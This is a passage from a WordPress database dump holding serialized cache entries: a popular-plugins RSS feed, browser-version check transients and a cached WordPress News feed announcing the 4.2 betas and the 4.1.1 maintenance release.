Cache\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/w3-total-cache/#post-12073\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Jul 2009 18:46:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"12073@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"Easy Web Performance Optimization (WPO) using caching: browser, page, object, database, minify and content delivery network support.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Frederick Townes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WP Google Maps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/wp-google-maps/#post-34206\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 25 Jan 2012 06:23:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"34206@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:146:\"The easiest to use Google maps plugin! Create a custom Google map with high quality markers containing categories, descriptions, images and links.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"WPGMaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"YITH WooCommerce Wishlist\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/plugins/yith-woocommerce-wishlist/#post-53596\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 23 May 2013 14:46:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"53596@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:125:\"YITH WooCommerce Wishlist add all Wishlist features to your website. Needs WooCommerce to work.\nWooCommerce 2.3.x compatible.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"YITHEMES\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:46:\"https://wordpress.org/plugins/rss/view/popular\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:12:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 22 Mar 2015 22:33:00 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:7:\"expires\";s:29:\"Sun, 22 Mar 2015 22:50:40 GMT\";s:13:\"cache-control\";s:0:\"\";s:6:\"pragma\";s:0:\"\";s:13:\"last-modified\";s:31:\"Sun, 22 Mar 2015 22:15:40 +0000\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20130911090210\";}','no'),(731,'_site_transient_timeout_browser_cdcb30699c7399132a5ee6cec6ca57b9','1426619587','yes'),(732,'_site_transient_browser_cdcb30699c7399132a5ee6cec6ca57b9','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"41.0.2272.76\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(836,'_site_transient_timeout_browser_b6cf843430be704d19438f6af29c89da','1426980372','yes'),(837,'_site_transient_browser_b6cf843430be704d19438f6af29c89da','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"41.0.2272.89\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(854,'_site_transient_timeout_browser_add73f3645db6b5dddab62367307a6a7','1427049310','yes'),(855,'_site_transient_browser_add73f3645db6b5dddab62367307a6a7','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"41.0.2272.89\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(1038,'_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','1427106778','no'),(1039,'_transient_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 19 Mar 2015 19:30:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/?v=4.2-beta2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.2 Beta 2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2015/03/wordpress-4-2-beta-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wordpress.org/news/2015/03/wordpress-4-2-beta-2/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 19 Mar 2015 19:30:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3498\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:337:\"WordPress 4.2 Beta 2 is now available! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.2, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Drew Jaynes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2326:\"<p>WordPress 4.2 Beta 2 is now available!</p>\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.2, try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"https://wordpress.org/wordpress-4.2-beta2.zip\">download the beta here</a> (zip).</p>\n<p>For more information about what’s new in version 4.2, <a href=\"https://wordpress.org/news/2015/03/wordpress-4-2-beta-1/\">check out the Beta 1 blog post</a>. Some of the changes in Beta 2 include:</p>\n<ul>\n<li>Added support for entering FTP and SSH credentials when <strong>updating plugins in-place</strong>. FTP and SSH users, please test!</li>\n<li><strong>Improved cross-browser support for emoji</strong> throughout WordPress. If you’re using an older web browser, please tell us if you have problems using emoji.</li>\n<li>Further <strong>refined Press This authoring</strong> with auto-embedded media and better content scanning. We’d love to know how auto-embeds work for you.</li>\n<li>Added a constructor and improved method consistency in <code>WP_Comment_Query</code>. Developers: if you’re extending <code>WP_Comment_Query</code>, please let us know if you run into any issues.</li>\n<li><strong>Various bug fixes</strong>. We’ve made <a href=\"https://core.trac.wordpress.org/log?action=stop_on_copy&mode=stop_on_copy&rev=31834&stop_rev=31763&limit=100\">more than 70 changes</a> in the last week.</li>\n</ul>\n<p>If you think you’ve found a bug, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums. Or, if you’re comfortable writing a bug report, <a href=\"https://core.trac.wordpress.org/\">file one on the WordPress Trac</a>. There, you can also find <a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a> and <a href=\"https://core.trac.wordpress.org/query?status=closed&group=component&milestone=4.2\">everything we’ve fixed</a>.</p>\n<p><em>Test some emoji</em><br />\n<em>FTP and SSH</em><br />\n<em>Let’s “Press” some embeds!</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/news/2015/03/wordpress-4-2-beta-2/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.2 Beta 1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2015/03/wordpress-4-2-beta-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wordpress.org/news/2015/03/wordpress-4-2-beta-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 Mar 2015 23:22:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3446\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:329:\"WordPress 4.2 Beta 1 is now available! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.2, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Drew Jaynes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4259:\"<p>WordPress 4.2 Beta 1 is now available!</p>\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.2, try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"https://wordpress.org/wordpress-4.2-beta1.zip\">download the beta here</a> (zip).</p>\n<p>4.2 is due out next month, but to get there, we need your help testing what we’ve been working on:</p>\n<ul>\n<li><strong>Press This</strong> has been completely revamped to make sharing content from around the web easier than ever. The new workflow is mobile friendly, and we’d love for you to try it out on all of your devices. Navigate to the Tools screen in your WordPress backend to get started (<a href=\"https://core.trac.wordpress.org/ticket/31373\">#31373</a>). </li>\n<li><strong>Browsing and switching installed themes</strong> has been added to the Customizer to make switching faster and more convenient. We’re especially interested to know if this helps streamline the process of setting up your site (<a href=\"https://core.trac.wordpress.org/ticket/31303\">#31303</a>).</li>\n<li>The workflow for <strong>updating and installing plugins</strong> just got more intuitive with the ability to install or update in-place from the Plugins screens. Try it out and let us know what you think! (<a href=\"https://core.trac.wordpress.org/ticket/29820\">#29820</a>)</li>\n<li>If you felt like <strong>emoji</strong> were starkly missing from your content toolbox, worry no more. We’ve added emoji support nearly everywhere, even post slugs <img src=\"https://s0.wp.com/wp-content/mu-plugins/emoji/twemoji/72x72/1f44d.png\" class=\"wp-smiley\" style=\"height: 1em;\" /> (<a href=\"https://core.trac.wordpress.org/ticket/31242\">#31242</a>).</li>\n</ul>\n<p><strong>Developers</strong>: There have been a lot of changes for you to test as well, including:</p>\n<ul>\n<li><strong>Taxonomy Roadmap:</strong> Terms shared across multiple taxonomies will <a href=\"https://make.wordpress.org/core/2015/02/16/taxonomy-term-splitting-in-4-2-a-developer-guide/\">now be split</a> into separate terms when one of them is updated. Please let us know if you hit any snags (<a href=\"https://core.trac.wordpress.org/ticket/5809/\">#5809</a>).</li>\n<li>New <code>wp.a11y.speak()</code> functionality helps your JavaScript talk to screen readers to better inform impaired users what’s happening on-screen. Try it out in your plugin or theme and let us know if you notice any adverse affects (<a href=\"https://core.trac.wordpress.org/ticket/31368/\">#31368</a>).</li>\n<li>Named clause support has been added to <code>WP_Query</code>, <code>WP_Comment_Query</code>, and <code>WP_User_Query</code>, allowing specific <code>meta_query</code> clauses to be used with <code>orderby</code>. If you have any complex queries, please test them (<a href=\"https://core.trac.wordpress.org/ticket/31045/\">#31045</a>, <a href=\"https://core.trac.wordpress.org/ticket/31265/\">#31265</a>).</li>\n</ul>\n<p>If you want a more in-depth view of what changes have made it into 4.2, <a href=\"https://make.wordpress.org/core/tag/week-in-core/\">check out the weekly review posts</a> on the main development blog.</p>\n<p><strong>If you think you’ve found a bug</strong>, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, <a href=\"https://make.wordpress.org/core/reports/\">file one on the WordPress Trac</a>. There, you can also find <a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a> and <a href=\"https://core.trac.wordpress.org/query?status=closed&group=component&milestone=4.2\">everything we’ve fixed</a> so far.</p>\n<p>Happy testing!</p>\n<p><em>Press This: switch a theme</em><br />\n<em>Save time installing plugins</em><br />\n<em>Testing makes us</em> <img src=\"https://s0.wp.com/wp-content/mu-plugins/emoji/twemoji/72x72/1f603.png\" class=\"wp-smiley\" style=\"height: 1em;\" /></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/news/2015/03/wordpress-4-2-beta-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:42:\"\n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"WordPress 4.1.1 Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2015/02/wordpress-4-1-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2015/02/wordpress-4-1-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 18 Feb 2015 23:40:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3436\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:345:\"WordPress 4.1.1 is now available. This maintenance release fixes 21 bugs in version 4.1. Some of you may have been waiting to update to the latest version until now, but there just wasn’t much to address. WordPress 4.1 was a smooth-sailing release and has seen more than 14 million downloads in the last two months. For a full […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3086:\"<p>WordPress 4.1.1 is now available. This maintenance release fixes 21 bugs in version 4.1.</p>\n<p>Some of you may have been waiting to update to the latest version until now, but there just wasn’t much to address. WordPress 4.1 was a smooth-sailing release and has seen more than 14 million downloads in the last two months.</p>\n<p class=\"p1\"><span class=\"s1\">For a full list of changes, consult the <a href=\"https://core.trac.wordpress.org/query?milestone=4.1.1&group=severity&order=component\">list of tickets</a> and the <a href=\"https://core.trac.wordpress.org/log/branches/4.1?stop_rev=30974&rev=31474\">changelog</a>. We fixed one annoying issue where a tag and a category with the same name could get muddled and prevent each other from being updated.</span></p>\n<p>If you are one of the millions already running WordPress 4.1 and your site, we’ve started rolling out automatic background updates for 4.1.1 for sites <a href=\"https://wordpress.org/plugins/background-update-tester/\">that support them</a>. Otherwise, <a href=\"https://wordpress.org/download/\">download WordPress 4.1.1</a> or visit <strong>Dashboard → Updates</strong> and simply click “Update Now.”</p>\n<p>Thanks to everyone who contributed to 4.1.1: <a href=\"https://profiles.wordpress.org/afercia\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/boonebgorges\">Boone Gorges</a>, <a href=\"https://profiles.wordpress.org/chrico\">ChriCo</a>, <a href=\"https://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/dlh\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/drewapicture\">Drew Jaynes</a>, <a href=\"https://profiles.wordpress.org/hissy\">Takuro Hishikawa</a>, <a 